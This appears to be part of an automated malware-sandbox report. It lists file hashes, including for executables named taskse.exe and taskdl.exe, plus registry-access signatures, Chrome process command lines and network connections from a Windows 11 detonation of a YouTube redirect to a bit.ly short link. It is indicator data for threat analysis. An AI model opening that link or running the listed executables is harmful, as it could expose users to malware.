| SHA512 | 3b90b035226242cd8a1f8a7adc7c069c404fa73de90660bf20741bf705c1e80f8ec4fecff77002051b4c5b7df6b45c00b881a5c9270795d15c70458cf3e53957 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 4b92aa40b204c839b051e057cabb6479 |
| SHA1 | 07470d28f88ef04e06a6fd36e336b62aabee41c0 |
| SHA256 | 810077f151544ed2e55cd5e9f9ac68f067e52b8baf4d84b0d085d3460b288709 |
| SHA512 | 8445ead874ebc92870984f32efb8c72f16fd683b1a49859c41880077c6632cd5dd33cb43f7fb2f384808837fd251fa673a9d10352e871870cf765bd298be3106 |
C:\Users\Admin\Downloads\taskse.exe
| MD5 | 8495400f199ac77853c53b5a3f278f3e |
| SHA1 | be5d6279874da315e3080b06083757aad9b32c23 |
| SHA256 | 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d |
| SHA512 | 0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 3273a9e9452ef2e9c192a1fe98ab0df3 |
| SHA1 | f0df04328e53bdf91d9388a445d60f4d2c8fa71f |
| SHA256 | c1bddc6c7dbbe3c3bea1a1e65f46634f9f4e4ef07228367ace9dfe23e818c015 |
| SHA512 | 76f3539d659b01619f5094f1dda2dede56664d8ce238aa716b599adfca775f95bc09b364318bba3a2eb948f5f3d660e5e89168f2f3e67f3bf21024e9d5b2a169 |
C:\Users\Admin\Downloads\taskdl.exe
| MD5 | 4fef5e34143e646dbf9907c4374276f5 |
| SHA1 | 47a9ad4125b6bd7c55e4e7da251e23f089407b8f |
| SHA256 | 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79 |
| SHA512 | 4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 2247e009e3a1899aea40be89bf483df4 |
| SHA1 | 45b58841288956b3e1247bd1b78b4506c143dc12 |
| SHA256 | cb4f64b8e2e931b3e1227d2487828ebe564ab8152bbdc2cecf5e4a0956686e68 |
| SHA512 | 921289bc93eeb9f06615fd123ebacca5f12ed5b3e1217e36190d9558be3971db0c1afd7f3f604c4fc2e9bd49d9fc775a11b01c50aecda0c42328b7a94c4e32bd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 72f371f603689fc51d6fd7cb47e06422 |
| SHA1 | 60a42f66af5298c40a362cc10a53e7b0bfb61019 |
| SHA256 | 4e5318ba6aa31ab7a244d69ea6b59e8e184f4c0365d2798b117d7886cfa74df2 |
| SHA512 | 177bfff575af1764cf593ff1d4b88c60b881ed66ef7e4ec84a79aa222f0f179d592578caf63b1b335f481499c77190994e463081fa47af9cd8a3e58de42a21ba |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-24 23:01
Reported
2024-03-24 23:32
Platform
win11-20240221-en
Max time kernel
1799s
Max time network
1685s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133557949524222617" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.youtube.com/redirect?event=comments&redir_token=QUFFLUhqbEdvM2JacWNycElueGhMazlTei16UW9PYmlJQXxBQ3Jtc0treDgtLVJhNUdxbDlBXzVkdEh6a3ZNYkFKMURVVWFha3c3LUhZZk84dUg4Q1VRNFBGOHE4TUJpckxHeHRSN2xaQWhVSU5OQlNMSmNaUHBWbjU1VzBtRi1FdGdEMmZDZFAwQ2NFM0xqYWVPUVZXOHA5RQ&q=https%3A%2F%2Fbit.ly%2F3Trfb6a&stzid=UgzgSIxotTTHMiWttmF4AaABAg
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff94ac29758,0x7ff94ac29768,0x7ff94ac29778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2200 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3004 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2348 --field-trial-handle=1856,i,3321024703543647972,14680449521278965012,131072 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.180.14:443 | www.youtube.com | tcp |
| GB | 142.250.180.14:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| GB | 142.250.180.14:443 | www.youtube.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
Files
\??\pipe\crashpad_4372_DARGNBHNZVMPWSMO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e1090d56f49a843616088700d6d105f4 |
| SHA1 | fe0233b1054afd649515f4e9896540ad9cca200b |
| SHA256 | 467ef44e5fa0c735646a5504ecbf94dfa357eaa9018179f1eb404db1b34d9b1d |
| SHA512 | 3c8160dfbc7f7a9f41d5793387e7a76f90550aab268aa891934c5876d209c720c7076b91355902cc739e31d39c341433b3790c4c60082e2b22837b7e3c166fef |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a372fa11a1a3544aa37b306ce95e1a04 |
| SHA1 | 91b4962726c52b8e3eea83cbcbfeb5d84dc6951b |
| SHA256 | fcf2903e64b197a7a4edf36b5fb43b9e0e22158d9ebdfbed2a9d5ea33436fcc2 |
| SHA512 | 20e68b2ef1dd7d85b59b5243f04983a1d7ba06ed9e8250b3371b2da09929866ed695992f575c39801a070563e8dd1b5c415069b9bc5f8210457d2a6795d5c1d9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | cc69bd7daac64ff5b8bff28a3376e33d |
| SHA1 | 6ccea5b9ccfcf5244c14caa85cb4681b1935586d |
| SHA256 | 4e1f6c42992369d55fefdc9a5c16d936f6267e33b8beea582da4b4001aa0f7dd |
| SHA512 | 168a3caf941425f451d399b4bfb61ea08bc8b462f7033e3ef5033fd2cc956b6dae2afdfbf4cf6fa2c68faec6507f5ef03ca275289cf9c4e5d57e33094b7fc049 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c83dd179ee869aa4e63ed2ee12294b10 |
| SHA1 | c45c0c2ef7b8c4d1f7f4419edb6cc0b9bd52e2dc |
| SHA256 | 7c435a9d1b68cdd2903453057c9999573b1cf2bf6720f335da448da305cd4a09 |
| SHA512 | 8e21316d9ca11526217af82d37a1048f1cbe35ee8456b6a581af114a40c0ad7a5f55d9dc337d844907910df45df6f1eb54bf1ad6ddfe7bd6fe42e3aa5788160a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 854a69ff777cdeda6f731ec32ada684e |
| SHA1 | ce2079667b3578985d3b65c62e3fc160b4b570a9 |
| SHA256 | ade94360ea532a9179fb3310d200e6c553af0c178c5ae81d4680954364389c30 |
| SHA512 | fc6f39b6c566c8ab93241c5b9b3993991071ff74611237b87cdc7effec8b0e538042760048f673e6cdcc24efd03ff59ce2d3fcb4a8760848d2bff6de06373557 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 0570b2e9dc506e708a7e26c224dc2a90 |
| SHA1 | c3bb615552b3a009bbc79cefb26bc7d0101e1870 |
| SHA256 | 3cf431f73ed967ebb5327cdd65c3777e259ecf3bc964d24d2c06466a67fea913 |
| SHA512 | 3cc3cafbb5576d33afb8330c327cd16695888d2d532794b6fa3240379521107a6c838f7727d8b53496a8538a20a46535b7bc17c393926b2c586c3258c02e3bba |